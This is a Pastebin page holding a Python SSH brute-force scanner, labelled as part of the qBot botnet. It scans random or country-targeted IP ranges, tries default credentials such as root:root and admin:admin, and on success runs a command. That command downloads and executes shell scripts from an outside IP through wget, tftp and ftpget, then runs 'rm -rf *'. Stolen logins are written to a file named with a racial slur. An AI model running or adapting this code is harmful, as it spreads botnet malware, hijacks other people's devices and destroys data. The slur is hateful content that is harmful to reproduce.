API tools faq
paste
Advertisement
dfmcvn

qBot - scan.py

dfmcvn
Feb 6th, 2017
2,050
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.55 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. # https://www.youtube.com/watch?v=WIKLu32cZbA
  3. import threading, paramiko, random, socket, time, sys
  4.  
  5. paramiko.util.log_to_file("/dev/null")
  6.  
  7. blacklist = [
  8.     '127'
  9. ]
  10.  
  11. passwords = [
  12.     "admin:admin"
  13. ]
  14.  
  15. if sys.argv[4] == '1':
  16.      passwords = ["root:root"]
  17. if sys.argv[4] == '2':
  18.      passwords = ["guest:guest"]
  19. if sys.argv[4] == '3':
  20.      passwords = ["admin:1234"]
  21. if sys.argv[4] == '4':
  22.      passwords = ["telnet:telnet","admin:123456","1234:1234","admin:admin","admin:admin123","admin:password","admin:root","camera:camera","D-Link:D-Link","default:default","dvr:dvr","root:1234","ubnt:ubnt","user:user"]
  23.  
  24. print "\x1b[0;31m*************************\x1b[0m"
  25. print "\x1b[0;31m*  Welcome To xodia  *\x1b[0m"
  26. print "\x1b[0;31m*      Scanner on!!     *\x1b[0m"
  27. print "\x1b[0;31m*************************\x1b[0m"
  28. print "\x1b[0;36mMade By Xodia\x1b[0m"
  29.  
  30. ipclassinfo = sys.argv[2]
  31. if ipclassinfo == "A":
  32.     ip1 = sys.argv[3]
  33. elif ipclassinfo == "B":
  34.     ip1 = sys.argv[3].split(".")[0]
  35.     ip2 = sys.argv[3].split(".")[1]
  36. elif ipclassinfo == "C":
  37.     ips = sys.argv[3].split(".")
  38.     num=0
  39.     for ip in ips:
  40.         num=num+1
  41.         if num == 1:
  42.             ip1 = ip
  43.         elif num == 2:
  44.             ip2 = ip
  45.         elif num == 3:
  46.             ip3 = ip
  47. class sshscanner(threading.Thread):
  48.     global passwords
  49.     global ipclassinfo
  50.     if ipclassinfo == "A":
  51.         global ip1
  52.     elif ipclassinfo == "B":
  53.         global ip1
  54.         global ip2
  55.     elif ipclassinfo == "C":
  56.         global ip1
  57.         global ip2
  58.         global ip3
  59.     def run(self):
  60.         while 1:
  61.             try:
  62.                 while 1:
  63.                     thisipisbad='no'
  64.                     if ipclassinfo == "A":
  65.                         self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  66.                     elif ipclassinfo == "B":
  67.                         self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  68.                     elif ipclassinfo == "C":
  69.                         self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  70.                     elif ipclassinfo == "BRAZIL":
  71.                         br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
  72.                         self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  73.                     elif ipclassinfo == "ER":
  74.                         yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
  75.                         self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  76.                     elif ipclassinfo == "LUCKY":
  77.                         lucky = ["125.27","101.109","113.53","118.173","122.170","122.180"]
  78.                         self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  79.                     elif ipclassinfo == "LUCKY2":
  80.                         lucky2 = [ "122.3","122.52","122.54","119.93" ]
  81.             self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  82.             elif ipclassinfo == "LUCKY3":
  83.                         lucky2 = [ "103.20","103.30","103.47","103.57" ]
  84.             self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  85.                     elif ipclassinfo == "RAND":
  86.                         self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  87.                     elif ipclassinfo == "INTERNET":
  88.                         lol = ["1"]
  89.                         self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  90.                     else:
  91.                         self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  92.                     for badip in blacklist:
  93.                         if badip in self.host:
  94.                             thisipisbad='yes'
  95.                     if thisipisbad=='no':
  96.                         break
  97.                 username='root'
  98.                 password=""
  99.                 port = 22
  100.                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  101.                 s.settimeout(3)
  102.                 s.connect((self.host, port))
  103.                 s.close()
  104.                 ssh = paramiko.SSHClient()
  105.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  106.                 dobreak=False
  107.                 for passwd in passwords:
  108.                     if ":n/a" in passwd:
  109.                         password=""
  110.                     else:
  111.                         password=passwd.split(":")[1]
  112.                     if "n/a:" in passwd:
  113.                         username=""
  114.                     else:
  115.                         username=passwd.split(":")[0]
  116.                     try:
  117.                         ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  118.                         dobreak=True
  119.                         break
  120.                     except:
  121.                         pass
  122.                     if True == dobreak:
  123.                         break
  124.                 badserver=True
  125.                 stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  126.                 output = stdout.read()
  127.                 if "inet addr" in output:
  128.                     badserver=False
  129.                 if badserver == False:
  130.                         print '\x1b[0;31mPOISONING \x1b[0;37m'+self.host+' \x1b[0;36m'+username+' \x1b[0;31m'+password+' \x1b[0;37m'+str(port)
  131.             ssh.exec_command("cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://5.206.225.136/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 5.206.225.136 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 5.206.225.136; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.206.225.136 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *")
  132.             nigger = open("niggers.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  133.                         time.sleep(15)
  134.                         ssh.close()
  135.             except:
  136.                 pass
  137.  
  138. for x in range(0,1500):
  139.     try:
  140.         t = sshscanner()
  141.         t.start()
  142.     except:
  143.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!